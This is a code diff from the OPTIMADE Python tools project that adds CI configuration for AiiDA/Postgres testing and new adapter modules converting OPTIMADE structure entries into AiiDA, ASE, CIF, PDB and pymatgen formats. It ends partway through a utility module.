diff --git a/.github/aiida/profile.yaml b/.github/aiida/profile.yaml new file mode 100644 index 00000000..582d2859 --- /dev/null +++ b/.github/aiida/profile.yaml @@ -0,0 +1,14 @@ +--- +profile: PLACEHOLDER_PROFILE +email: aiida@localhost +first_name: AiiDA +last_name: OPTIMADE +institution: Materials-Consortia +db_backend: PLACEHOLDER_BACKEND +db_engine: postgresql_psycopg2 +db_host: localhost +db_port: 5432 +db_name: PLACEHOLDER_DATABASE_NAME +db_username: postgres +db_password: test +repository: PLACEHOLDER_REPOSITORY \ No newline at end of file diff --git a/.github/aiida/setup_aiida.sh b/.github/aiida/setup_aiida.sh new file mode 100755 index 00000000..2c481e3a --- /dev/null +++ b/.github/aiida/setup_aiida.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +set -ev + +# Replace the placeholders in configuration files with actual values +CONFIG="${GITHUB_WORKSPACE}/.github/aiida" +sed -i "s|PLACEHOLDER_BACKEND|${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_PROFILE|test_${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_DATABASE_NAME|test_${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_REPOSITORY|/tmp/test_repository_test_${AIIDA_TEST_BACKEND}/|" "${CONFIG}/profile.yaml" + +verdi setup --config "${CONFIG}/profile.yaml" + +verdi profile setdefault test_${AIIDA_TEST_BACKEND} diff --git a/.github/workflows/deps_eager.yml b/.github/workflows/deps_eager.yml index 9a4487ec..8390ba83 100644 --- a/.github/workflows/deps_eager.yml +++ b/.github/workflows/deps_eager.yml @@ -18,13 +18,25 @@ jobs: python-version: [3.6, 3.7, 3.8] services: - mongo: - image: mongo:4.2 - ports: - - 27017:27017 + mongo: + image: mongo:4.2 + ports: + - 27017:27017 + postgres: + image: postgres:10 + env: + POSTGRES_DB: test_django + POSTGRES_PASSWORD: test + options: >- + --health-cmd pg_isready + --health-interval 10s + --health-timeout 5s + --health-retries 5 + ports: + - 5432:5432 steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v1 @@ -35,8 +47,8 @@ jobs: run: | python -m pip install --upgrade pip pip install -U setuptools - # Install package clean with all dependencies followed by eager update install - pip install -e .[testing,django,elastic] + # Install package clean with test dependencies followed by eager update install + pip install -e .[testing] pip install -U --upgrade-strategy eager -r .github/workflows/requirements_eager.txt - name: Run tests on updated packages @@ -49,6 +61,20 @@ jobs: env: OPTIMADE_CI_FORCE_MONGO: 0 + - name: Install adapter conversion dependencies (eagerly) + run: | + pip install -U --upgrade-strategy eager -e .[all] + # AiiDA-specific + reentry scan + + - name: Setup up environment for AiiDA + env: + AIIDA_TEST_BACKEND: django + run: .github/aiida/setup_aiida.sh + + - name: Run previously skipped tests for adapter conversion + run: pytest -rs --cov=./optimade/ --cov-report=xml --cov-append tests/adapters/ + # deps_clean-install: # runs-on: ubuntu-latest # strategy: @@ -58,7 +84,7 @@ jobs: # python-version: [3.6, 3.7, 3.8] # steps: - # - uses: actions/checkout@master + # - uses: actions/checkout@v2 # - name: Set up Python ${{ matrix.python-version }} # uses: actions/setup-python@v1 diff --git a/.github/workflows/deps_lint.yml b/.github/workflows/deps_lint.yml index f4710728..c6feb66b 100644 --- a/.github/workflows/deps_lint.yml +++ b/.github/workflows/deps_lint.yml @@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 @@ -37,7 +37,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 @@ -59,7 +59,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 @@ -94,7 +94,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Build the Docker images run: docker-compose build @@ -138,13 +138,25 @@ jobs: python-version: [3.6, 3.7, 3.8] services: - mongo: - image: mongo:4.2 - ports: - - 27017:27017 + mongo: + image: mongo:4.2 + ports: + - 27017:27017 + postgres: + image: postgres:10 + env: + POSTGRES_DB: test_django + POSTGRES_PASSWORD: test + options: >- + --health-cmd pg_isready + --health-interval 10s + --health-timeout 5s + --health-retries 5 + ports: + - 5432:5432 steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v1 @@ -157,7 +169,7 @@ jobs: pip install -U setuptools # Install static dependencies followed by "normal" install python -m pip install -r .github/workflows/requirements.txt - pip install -e .[all] + pip install -e .[testing] - name: Run all tests (using a real MongoDB) run: pytest -rs --cov=./optimade/ --cov-report=xml @@ -169,6 +181,20 @@ jobs: env: OPTIMADE_CI_FORCE_MONGO: 0 + - name: Install adapter conversion dependencies + run: | + pip install -e .[all] + # AiiDA-specific + reentry scan + + - name: Setup up environment for AiiDA + env: + AIIDA_TEST_BACKEND: django + run: .github/aiida/setup_aiida.sh + + - name: Run previously skipped tests for adapter conversion + run: pytest -rs --cov=./optimade/ --cov-report=xml --cov-append tests/adapters/ + - name: Upload coverage to Codecov if: matrix.python-version == 3.7 && github.repository == 'Materials-Consortia/optimade-python-tools' uses: codecov/codecov-action@v1 diff --git a/.github/workflows/publish-on-pypi.yml b/.github/workflows/publish-on-pypi.yml index a699dfd1..03655a10 100644 --- a/.github/workflows/publish-on-pypi.yml +++ b/.github/workflows/publish-on-pypi.yml @@ -12,7 +12,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@master + uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 diff --git a/.github/workflows/requirements.txt b/.github/workflows/requirements.txt index 7254f41d..18660b2c 100644 --- a/.github/workflows/requirements.txt +++ b/.github/workflows/requirements.txt @@ -1,5 +1,5 @@ -lark-parser==0.8.1 -fastapi==0.52.0 +lark-parser==0.8.5 +fastapi==0.53.1 pydantic==1.4 email_validator==1.0.5 requests==2.23.0 diff --git a/optimade/adapters/__init__.py b/optimade/adapters/__init__.py new file mode 100644 index 00000000..5429d7b2 --- /dev/null +++ b/optimade/adapters/__init__.py @@ -0,0 +1,7 @@ +# pylint: disable=undefined-variable +from .exceptions import * +from .references import * +from .structures import * + + +__all__ = exceptions.__all__ + references.__all__ + structures.__all__ diff --git a/optimade/adapters/base.py b/optimade/adapters/base.py new file mode 100644 index 00000000..f1b8b36d --- /dev/null +++ b/optimade/adapters/base.py @@ -0,0 +1,120 @@ +import re +from typing import Union, Dict, Callable, Any, Tuple, List + +from pydantic import BaseModel # pylint: disable=no-name-in-module + +from optimade.models import EntryResource + + +class EntryAdapter: + """Base class for lazy resource entry adapters + :param entry: JSON OPTIMADE single resource entry. + """ + + ENTRY_RESOURCE: EntryResource = EntryResource + _type_converters: Dict[str, Callable] = {} + + def __init__(self, entry: dict): + self._entry = None + self._converted = {} + + self.entry = entry + + # Note that these return also the default values for otherwise non-provided properties. + self._common_converters = { + "json": self.entry.json, # Return JSON serialized string, see https://pydantic-docs.helpmanual.io/usage/exporting_models/#modeljson + "dict": self.entry.dict, # Return Python dict, see https://pydantic-docs.helpmanual.io/usage/exporting_models/#modeldict + } + + @property + def entry(self): + """Get OPTIMADE entry""" + return self._entry + + @entry.setter + def entry(self, value: dict): + """Set OPTIMADE entry + If already set, print that this can _only_ be set once. + """ + if self._entry is None: + self._entry = self.ENTRY_RESOURCE(**value) + else: + print("entry can only be set once and is already set.") + + def convert(self, format: str) -> Any: + """Convert OPTIMADE entry to desired format""" + if ( + format not in self._type_converters + and format not in self._common_converters + ): + raise AttributeError( + f"Non-valid entry type to convert to: {format}\n" + f"Valid entry types: {tuple(self._type_converters.keys()) + tuple(self._common_converters.keys())}" + ) + + if self._converted.get(format, None) is None: + if format in self._type_converters: + self._converted[format] = self._type_converters[format](self.entry) + else: + self._converted[format] = self._common_converters[format]() + + return self._converted[format] + + @staticmethod + def _get_model_attributes( + starting_instances: Union[Tuple[BaseModel], List[BaseModel]], name: str + ) -> Any: + """Helper method for retrieving the OPTIMADE model's attribute, supporting "."-nested attributes""" + for res in starting_instances: + nested_attributes = name.split(".") + for nested_attribute in nested_attributes: + if nested_attribute in getattr(res, "__fields__", {}): + res = getattr(res, nested_attribute) + else: + res = None + break + if res is not None: + return res + raise AttributeError + + def __getattr__(self, name: str) -> Any: + """Get converted entry or attribute from OPTIMADE entry + Support any level of "."-nested OPTIMADE ENTRY_RESOURCE attributes, e.g., `attributes.species` for StuctureResource. + NOTE: All nested attributes must individually be subclasses of `pydantic.BaseModel`, + i.e., one can not access nested attributes in lists by passing a "."-nested `name` to this method, + e.g., `attributes.species.name` or `attributes.species[0].name` will not work for variable `name`. + + Order: + - Try to return converted entry if using `as_<_type_converters key>`. + - Try to return OPTIMADE ENTRY_RESOURCE (nested) attribute. + - Try to return OPTIMADE ENTRY_RESOURCE.attributes (nested) attribute. + - Raise AttributeError + """ + # as_<entry_type> + if name.startswith("as_"): + entry_type = "_".join(name.split("_")[1:]) + return self.convert(entry_type) + + # Try returning ENTRY_RESOURCE attribute + try: + res = self._get_model_attributes((self.entry, self.entry.attributes), name) + except AttributeError: + pass + else: + return res + + # Non-valid attribute + entry_resource_name = re.match( + r"(<class ')([a-zA-Z_]+\.)*([a-zA-Z_]+)('>)", str(self.ENTRY_RESOURCE) + ) + entry_resource_name = ( + entry_resource_name.group(3) + if entry_resource_name is not None + else "UNKNOWN RESOURCE" + ) + raise AttributeError( + f"Unknown attribute: {name}\n" + "If you want to get a converted entry as <entry_type> use `as_<entry_type>`, " + f"where `<entry_type>` is one of {tuple(self._type_converters.keys()) + tuple(self._common_converters.keys())}\n" + f"Otherwise, you can try to retrieve an OPTIMADE {entry_resource_name} attribute or property." + ) diff --git a/optimade/adapters/exceptions.py b/optimade/adapters/exceptions.py new file mode 100644 index 00000000..c58a6072 --- /dev/null +++ b/optimade/adapters/exceptions.py @@ -0,0 +1,5 @@ +__all__ = ("ConversionError",) + + +class ConversionError(Exception): + """Could not convert entry to format""" diff --git a/optimade/adapters/references/__init__.py b/optimade/adapters/references/__init__.py new file mode 100644 index 00000000..6a661e1c --- /dev/null +++ b/optimade/adapters/references/__init__.py @@ -0,0 +1,16 @@ +from typing import Union + +from optimade.models import ReferenceResource + +from optimade.adapters.base import EntryAdapter + + +__all__ = ("Reference",) + + +class Reference(EntryAdapter): + """Lazy reference resource converter + :param reference: a single JSON OPTIMADE reference resource entry. + """ + + ENTRY_RESOURCE = ReferenceResource diff --git a/optimade/adapters/structures/__init__.py b/optimade/adapters/structures/__init__.py new file mode 100644 index 00000000..0ad2172a --- /dev/null +++ b/optimade/adapters/structures/__init__.py @@ -0,0 +1,30 @@ +from typing import Union + +from optimade.models import StructureResource + +from optimade.adapters.base import EntryAdapter + +from .aiida import get_aiida_structure_data +from .ase import get_ase_atoms +from .cif import get_cif +from .proteindatabank import get_pdb, get_pdbx_mmcif +from .pymatgen import get_pymatgen + + +__all__ = ("Structure",) + + +class Structure(EntryAdapter): + """Lazy structure resource converter + :param structure: a single JSON OPTIMADE structure resource entry. + """ + + ENTRY_RESOURCE = StructureResource + _type_converters = { + "aiida_structuredata": get_aiida_structure_data, + "ase": get_ase_atoms, + "cif": get_cif, + "pdb": get_pdb, + "pdbx_mmcif": get_pdbx_mmcif, + "pymatgen": get_pymatgen, + } diff --git a/optimade/adapters/structures/aiida.py b/optimade/adapters/structures/aiida.py new file mode 100644 index 00000000..755c7739 --- /dev/null +++ b/optimade/adapters/structures/aiida.py @@ -0,0 +1,75 @@ +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.structures.utils import pad_cell, pad_positions + +try: + from aiida.orm.nodes.data.structure import StructureData, Kind, Site +except (ImportError, ModuleNotFoundError): + from warnings import warn + + StructureData = None + AIIDA_NOT_FOUND = ( + "AiiDA not found, cannot convert structure to an AiiDA StructureData" + ) + + +__all__ = ("get_aiida_structure_data",) + + +def get_aiida_structure_data(optimade_structure: OptimadeStructure) -> StructureData: + """ Get AiiDA StructureData from OPTIMADE structure + :param optimade_structure: OPTIMADE structure + :return: StructureData + """ + if globals().get("StructureData", None) is None: + warn(AIIDA_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Convert null/None values to float("nan") + lattice_vectors, adjust_cell = pad_cell(attributes.lattice_vectors) + structure = StructureData(cell=lattice_vectors) + + # Add Kinds + for kind in attributes.species: + symbols = [] + concentration = [] + for index, chemical_symbol in enumerate(kind.chemical_symbols): + # NOTE: The non-chemical element identifier "X" is identical to how AiiDA handles this, + # so it will be treated the same as any other true chemical identifier. + if chemical_symbol == "vacancy": + # Skip. This is how AiiDA handles vacancies; + # to not include them, while keeping the concentration in a site less than 1. + continue + else: + symbols.append(chemical_symbol) + concentration.append(kind.concentration[index]) + + # AiiDA needs a definition for the mass, and for it to be > 0 + # mass is OPTIONAL for OPTIMADE structures + mass = kind.mass if kind.mass else 1 + + structure.append_kind( + Kind(symbols=symbols, weights=concentration, mass=mass, name=kind.name) + ) + + # Convert null/None values to float("nan") + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + # Add Sites + for index in range(attributes.nsites): + # range() to ensure 1-to-1 between kind and site + structure.append_site( + Site( + kind_name=attributes.species_at_sites[index], + position=cartesian_site_positions[index], + ) + ) + + if adjust_cell: + structure._adjust_default_cell( + pbc=[bool(dim.value) for dim in attributes.dimension_types] + ) + + return structure diff --git a/optimade/adapters/structures/ase.py b/optimade/adapters/structures/ase.py new file mode 100644 index 00000000..6bc05b20 --- /dev/null +++ b/optimade/adapters/structures/ase.py @@ -0,0 +1,56 @@ +from typing import Dict +from warnings import warn + +from optimade.models import Species as OptimadeStructureSpecies +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.exceptions import ConversionError + +try: + from ase import Atoms, Atom +except (ImportError, ModuleNotFoundError): + Atoms = None + ASE_NOT_FOUND = "ASE not found, cannot convert structure to an ASE Atoms" + + +__all__ = ("get_ase_atoms",) + + +def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: + """ Get ASE Atoms from OPTIMADE structure + + NOTE: Cannot handle partial occupancies (this includes vacancies) + + :param optimade_structure: OPTIMADE structure + :return: ASE.Atoms + """ + if globals().get("Atoms", None) is None: + warn(ASE_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Cannot handle partial occupancies + if "disorder" in attributes.structure_features: + raise ConversionError( + "ASE cannot handle structures with partial occupancies, sorry." + ) + + species: Dict[str, OptimadeStructureSpecies] = { + species.name: species for species in attributes.species + } + + atoms = [] + for site_number in range(attributes.nsites): + species_name = attributes.species_at_sites[site_number] + site = attributes.cartesian_site_positions[site_number] + + current_species = species[species_name] + + atoms.append( + Atom(symbol=species_name, position=site, mass=current_species.mass) + ) + + return Atoms( + symbols=atoms, cell=attributes.lattice_vectors, pbc=attributes.dimension_types + ) diff --git a/optimade/adapters/structures/cif.py b/optimade/adapters/structures/cif.py new file mode 100644 index 00000000..c12b3557 --- /dev/null +++ b/optimade/adapters/structures/cif.py @@ -0,0 +1,139 @@ +import re +from typing import Dict + +from optimade.models import Species as OptimadeStructureSpecies +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.structures.utils import ( + cell_to_cellpar, + pad_positions, + fractional_coordinates, +) + +try: + import numpy as np +except ImportError: + from warnings import warn + + np = None + NUMPY_NOT_FOUND = "NumPy not found, cannot convert structure to CIF" + + +__all__ = ("get_cif",) + + +def get_cif( # pylint: disable=too-many-locals,too-many-branches + optimade_structure: OptimadeStructure, +) -> str: + """ Get CIF file as string from OPTIMADE structure + + Based on `ase.io.cif:write_cif()`. + + :param optimade_structure: OPTIMADE structure + :param formatting: What formatting to use for the CIF file data keys. + Can be either "mp" or "default". + :param encoding: Encoding used for the string. CIF files use "latin-1" as standard. + If encoding is "str", a Python str object will be returned. + :return: str + """ + # NumPy is needed for calculations + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cif = """# +# Created from an OPTIMADE structure. +# +# See https://www.optimade.org and/or +# https://github.com/Materials-Consortia/OPTIMADE for more information. +# +""" + + cif += f"data_{optimade_structure.id}\n\n" + + attributes = optimade_structure.attributes + + # Do this only if there's three non-zero lattice vectors + # NOTE: This also negates handling of lattice_vectors with null/None values + if all(attributes.dimension_types): + a_vector, b_vector, c_vector, alpha, beta, gamma = cell_to_cellpar( + attributes.lattice_vectors + ) + + cif += ( + f"_cell_length_a {a_vector:g}\n" + f"_cell_length_b {b_vector:g}\n" + f"_cell_length_c {c_vector:g}\n" + f"_cell_angle_alpha {alpha:g}\n" + f"_cell_angle_beta {beta:g}\n" + f"_cell_angle_gamma {gamma:g}\n\n" + ) + cif += ( + "_symmetry_space_group_name_H-M 'P 1'\n" + "_symmetry_int_tables_number 1\n\n" + "loop_\n" + " _symmetry_equiv_pos_as_xyz\n" + " 'x, y, z'\n\n" + ) + + # Since some structure viewers are having issues with cartesian coordinates, + # we calculate the fractional coordinates if this is a 3D structure and we have all the necessary information. + if not hasattr(attributes, "fractional_site_positions"): + sites, _ = pad_positions(attributes.cartesian_site_positions) + attributes.fractional_site_positions = fractional_coordinates( + cell=attributes.lattice_vectors, cartesian_positions=sites + ) + + # NOTE: This is otherwise a bit ahead of its time, since this OPTIMADE property is part of an open PR. + # See https://github.com/Materials-Consortia/OPTIMADE/pull/206 + coord_type = ( + "fract" if hasattr(attributes, "fractional_site_positions") else "Cartn" + ) + + cif += ( + "loop_\n" + " _atom_site_label\n" # species.name + " _atom_site_occupancy\n" # species.concentration + f" _atom_site_{coord_type}_x\n" # cartesian_site_positions + f" _atom_site_{coord_type}_y\n" # cartesian_site_positions + f" _atom_site_{coord_type}_z\n" # cartesian_site_positions + " _atom_site_thermal_displace_type\n" # Set to 'Biso' + " _atom_site_B_iso_or_equiv\n" # Set to 1.0:f + " _atom_site_type_symbol\n" # species.chemical_symbols + ) + + if coord_type == "fract": + sites, _ = pad_positions(attributes.fractional_site_positions) + else: + sites, _ = pad_positions(attributes.cartesian_site_positions) + + species: Dict[str, OptimadeStructureSpecies] = { + species.name: species for species in attributes.species + } + + for site_number in range(attributes.nsites): + species_name = attributes.species_at_sites[site_number] + site = sites[site_number] + + current_species = species[species_name] + + for index, symbol in enumerate(current_species.chemical_symbols): + if symbol == "vacancy": + continue + + label = species_name + if len(current_species.chemical_symbols) > 1: + if ( + "vacancy" in current_species.chemical_symbols + and len(current_species.chemical_symbols) == 2 + ): + pass + else: + label = f"{symbol}{index + 1}" + + cif += ( + f" {label:8} {current_species.concentration[index]:6.4f} {site[0]:8.5f} " + f"{site[1]:8.5f} {site[2]:8.5f} {'Biso':4} {'1.000':6} {symbol}\n" + ) + + return cif diff --git a/optimade/adapters/structures/proteindatabank.py b/optimade/adapters/structures/proteindatabank.py new file mode 100644 index 00000000..0c02dca1 --- /dev/null +++ b/optimade/adapters/structures/proteindatabank.py @@ -0,0 +1,252 @@ +# pylint: disable=unreachable +from typing import Dict + +try: + import numpy as np +except ImportError: + from warnings import warn + + np = None + NUMPY_NOT_FOUND = "NumPy not found, cannot convert structure to your desired format" + +from optimade.models import Species as OptimadeStructureSpecies +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.structures.utils import ( + cell_to_cellpar, + cellpar_to_cell, + fractional_coordinates, + pad_positions, + scaled_cell, +) + + +__all__ = ("get_pdb", "get_pdbx_mmcif") + + +def get_pdbx_mmcif( # pylint: disable=too-many-locals + optimade_structure: OptimadeStructure, +) -> str: # pragma: no cover + """ Write Protein Data Bank (PDB) structure in the PDBx/mmCIF format from OPTIMADE structure + + Inspired by `ase.io.proteindatabank:write_proteindatabank()` in the ASE package, + as well as `ase.io.cif:write_cif()`. + + :param optimade_structure: OPTIMADE structure + :return: str + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cif = """# +# Created from an OPTIMADE structure. +# +# See https://www.optimade.org and/or +# https://github.com/Materials-Consortia/OPTIMADE for more information. +# +# CIF 2.0 format, specifically mmCIF (PDBx). +# See http://mmcif.wwpdb.org for more information. +# +""" + + entry_id = f"{optimade_structure.type}{optimade_structure.id}" + cif += f"data_{entry_id}\n_entry.id {entry_id}\n#\n" + + attributes = optimade_structure.attributes + + # Do this only if there's three non-zero lattice vectors + if all(attributes.dimension_types): + a_vector, b_vector, c_vector, alpha, beta, gamma = cell_to_cellpar( + attributes.lattice_vectors + ) + + cif += ( + f"_cell.entry_id {entry_id}\n" + f"_cell.length_a {a_vector:g}\n" + f"_cell.length_b {b_vector:g}\n" + f"_cell.length_c {c_vector:g}\n" + f"_cell.angle_alpha {alpha:g}\n" + f"_cell.angle_beta {beta:g}\n" + f"_cell.angle_gamma {gamma:g}\n" + "_cell.Z_PDB 1\n#\n" + ) + cif += ( + f"_symmetry.entry_id {entry_id}\n" + "_symmetry.space_group_name_H-M 'P 1'\n" + "_symmetry.Int_Tables_number 1\n#\n" + ) + + # Since some structure viewers are having issues with cartesian coordinates, + # we calculate the fractional coordinates if this is a 3D structure and we have all the necessary information. + if not hasattr(attributes, "fractional_site_positions"): + sites, _ = pad_positions(attributes.cartesian_site_positions) + attributes.fractional_site_positions = fractional_coordinates( + cell=attributes.lattice_vectors, cartesian_positions=sites + ) + + # TODO: The following lines are perhaps needed to create a "valid" PDBx/mmCIF file. + # However, at the same time, the information here is "default" and will for all structures "at this moment in time" + # be the same. I.e., no information is gained by adding this now. + # If it is found that they indeed are needed to create a "valid" PDBx/mmCIF file, they should be included in the output. + # cif += ( + # "loop_\n" + # "_struct_asym.id\n" + # "_struct_asym.entity_id\n" + # "A 1\n#\n" # At this point, not using this feature. + # ) + + # cif += ( + # "loop_\n" + # "_chem_comp.id\n" + # "X\n#\n" # At this point, not using this feature. + # ) + + # cif += ( + # "loop_\n" + # "_entity.id\n" + # "1\n#\n" # At this point, not using this feature. + # ) + + # NOTE: This is otherwise a bit ahead of its time, since this OPTIMADE property is part of an open PR. + # See https://github.com/Materials-Consortia/OPTIMADE/pull/206 + coord_type = ( + "fract" if hasattr(attributes, "fractional_site_positions") else "Cartn" + ) + + cif += ( + "loop_\n" + "_atom_site.group_PDB\n" # Always "ATOM" + "_atom_site.id\n" # number (1-counting) + "_atom_site.type_symbol\n" # species.chemical_symbols + "_atom_site.label_atom_id\n" # species.checmical_symbols symbol + number + # For these next keys, see the comment above. + # "_atom_site.label_asym_id\n" # Will be set to "A" _struct_asym.id above + # "_atom_site.label_comp_id\n" # Will be set to "X" _chem_comp.id above + # "_atom_site.label_entity_id\n" # Will be set to "1" _entity.id above + # "_atom_site.label_seq_id\n" + "_atom_site.occupancy\n" # species.concentration + f"_atom_site.{coord_type}_x\n" # cartesian_site_positions + f"_atom_site.{coord_type}_y\n" # cartesian_site_positions + f"_atom_site.{coord_type}_z\n" # cartesian_site_positions + "_atom_site.thermal_displace_type\n" # Set to 'Biso' + "_atom_site.B_iso_or_equiv\n" # Set to 1.0:f + ) + + if coord_type == "fract": + sites, _ = pad_positions(attributes.fractional_site_positions) + else: + sites, _ = pad_positions(attributes.cartesian_site_positions) + + species: Dict[str, OptimadeStructureSpecies] = { + species.name: species for species in attributes.species + } + + for site_number in range(attributes.nsites): + species_name = attributes.species_at_sites[site_number] + site = sites[site_number] + + current_species = species[species_name] + + for index, symbol in enumerate(current_species.chemical_symbols): + if symbol == "vacancy": + continue + + label = f"{species_name.upper()}{site_number + 1}" + if len(current_species.chemical_symbols) > 1: + if ( + "vacancy" in current_species.chemical_symbols + and len(current_species.chemical_symbols) == 2 + ): + pass + else: + label = f"{symbol.upper()}{index + 1}" + + cif += ( + f"ATOM {site_number + 1:5d} {symbol} {label:8} " + f"{current_species.concentration[index]:6.4f} {site[0]:8.5f} " + f"{site[1]:8.5f} {site[2]:8.5f} {'Biso':4} {'1.000':6}\n" + ) + + return cif + + +def get_pdb( # pylint: disable=too-many-locals + optimade_structure: OptimadeStructure, +) -> str: + """ Write Protein Data Bank (PDB) structure in the old PDB format from OPTIMADE structure + + Inspired by `ase.io.proteindatabank.write_proteindatabank()` in the ASE package. + + :param optimade_structure: OPTIMADE structure + :return: str + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + pdb = "" + + attributes = optimade_structure.attributes + + rotation = None + if all(attributes.dimension_types): + currentcell = np.asarray(attributes.lattice_vectors) + cellpar = cell_to_cellpar(currentcell) + exportedcell = cellpar_to_cell(cellpar) + rotation = np.linalg.solve(currentcell, exportedcell) + # Setting Z-value = 1 and using P1 since we have all atoms defined explicitly + Z = 1 + spacegroup = "P 1" + pdb += ( + f"CRYST1{cellpar[0]:9.3f}{cellpar[1]:9.3f}{cellpar[2]:8.3f}" + f"{cellpar[3]:7.2f}{cellpar[4]:7.2f}{cellpar[5]:7.2f} {spacegroup:11s}{Z:4d}\n" + ) + + for i, vector in enumerate(scaled_cell(currentcell)): + pdb += f"SCALE{i + 1} {vector[0]:10.6f}{vector[1]:10.6f}{vector[2]:10.6f} {0:10.5f}\n" + + # There is a limit of 5 digit numbers in this field. + pdb_maxnum = 100000 + bfactor = 1.0 + + pdb += "MODEL 1\n" + + species: Dict[str, OptimadeStructureSpecies] = { + species.name: species for species in attributes.species + } + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + sites = np.asarray(cartesian_site_positions) + if rotation is not None: + sites = sites.dot(rotation) + + for site_number in range(attributes.nsites): + species_name = attributes.species_at_sites[site_number] + site = sites[site_number] + + current_species = species[species_name] + + for index, symbol in enumerate(current_species.chemical_symbols): + if symbol == "vacancy": + continue + + label = species_name + if len(current_species.chemical_symbols) > 1: + if ( + "vacancy" in current_species.chemical_symbols + and len(current_species.chemical_symbols) == 2 + ): + pass + else: + label = f"{symbol}{index + 1}" + + pdb += ( + f"ATOM {site_number % pdb_maxnum:5d} {label:4} MOL 1 " + f"{site[0]:8.3f}{site[1]:8.3f}{site[2]:8.3f}" + f"{current_species.concentration[index]:6.2f}" + f"{bfactor:6.2f} {symbol.upper():2} \n" + ) + pdb += "ENDMDL\n" + + return pdb diff --git a/optimade/adapters/structures/pymatgen.py b/optimade/adapters/structures/pymatgen.py new file mode 100644 index 00000000..0b23c161 --- /dev/null +++ b/optimade/adapters/structures/pymatgen.py @@ -0,0 +1,103 @@ +from typing import Union, Dict, List + +from optimade.models import Species as OptimadeStructureSpecies +from optimade.models import StructureResource as OptimadeStructure +from optimade.models.structures import Periodicity + +from optimade.adapters.structures.utils import pad_positions + +try: + from pymatgen import Structure, Molecule + +except (ImportError, ModuleNotFoundError): + from warnings import warn + + Structure = None + Molecule = None + PYMATGEN_NOT_FOUND = "Pymatgen not found, cannot convert structure to a pymatgen Structure or Molecule" + + +__all__ = ("get_pymatgen",) + + +def get_pymatgen(optimade_structure: OptimadeStructure) -> Union[Structure, Molecule]: + """ Get pymatgen Structure or Molecule from OPTIMADE structure + + :param optimade_structure: OPTIMADE structure + :return: pymatgen.Structure , pymatgen.Molecule + """ + if globals().get("Structure", None) is None: + warn(PYMATGEN_NOT_FOUND) + return None + + if all(optimade_structure.attributes.dimension_types): + return _get_structure(optimade_structure) + + return _get_molecule(optimade_structure) + + +def _get_structure(optimade_structure: OptimadeStructure) -> Structure: + """Create pymatgen Structure from OPTIMADE structure""" + + attributes = optimade_structure.attributes + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Structure( + lattice=attributes.lattice_vectors, + species=_pymatgen_species( + nsites=attributes.nsites, + species=attributes.species, + species_at_sites=attributes.species_at_sites, + ), + coords=cartesian_site_positions, + coords_are_cartesian=True, + ) + + +def _get_molecule(optimade_structure: OptimadeStructure) -> Molecule: + """Create pymatgen Molecule from OPTIMADE structure""" + + attributes = optimade_structure.attributes + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Molecule( + species=_pymatgen_species( + nsites=attributes.nsites, + species=attributes.species, + species_at_sites=attributes.species_at_sites, + ), + coords=cartesian_site_positions, + ) + + +def _pymatgen_species( + nsites: int, species: List[OptimadeStructureSpecies], species_at_sites: List[str] +) -> List[Dict[str, float]]: + """ + Create list of {"symbol": "concentration"} per site for values to pymatgen species parameters. + Remove vacancies, if they are present. + """ + + optimade_species = {_.name: _ for _ in species} + + pymatgen_species = [] + for site_number in range(nsites): + species_name = species_at_sites[site_number] + current_species = optimade_species[species_name] + + chemical_symbols = [] + concentration = [] + for index, symbol in enumerate(current_species.chemical_symbols): + if symbol == "vacancy": + # Skip. This is how pymatgen handles vacancies; + # to not include them, while keeping the concentration in a site less than 1. + continue + else: + chemical_symbols.append(symbol) + concentration.append(current_species.concentration[index]) + + pymatgen_species.append(dict(zip(chemical_symbols, concentration))) + + return pymatgen_species diff --git a/optimade/adapters/structures/utils.py b/optimade/adapters/structures/utils.py new file mode 100644 index 00000000..32fe3c36 --- /dev/null +++ b/optimade/adapters/structures/utils.py @@ -0,0 +1,249 @@ +# pylint: disable=invalid-name +from typing import List, Tuple, Iterable + +from optimade.models import StructureResourceAttributes +from optimade.models.structures import Vector3D + +from optimade.adapters.exceptions import ConversionError + +try: + import numpy as np +except ImportError: + from warnings import warn + + np = None + NUMPY_NOT_FOUND = "NumPy not found, cannot convert structure to your desired format" + + +def scaled_cell( + cell: Tuple[Vector3D, Vector3D, Vector3D] +) -> Tuple[Vector3D, Vector3D, Vector3D]: + """Return a scaled 3x3 cell from cartesian 3x3 cell (`lattice_vectors`) + + This is based on PDB's method of calculating SCALE from CRYST data. + For more 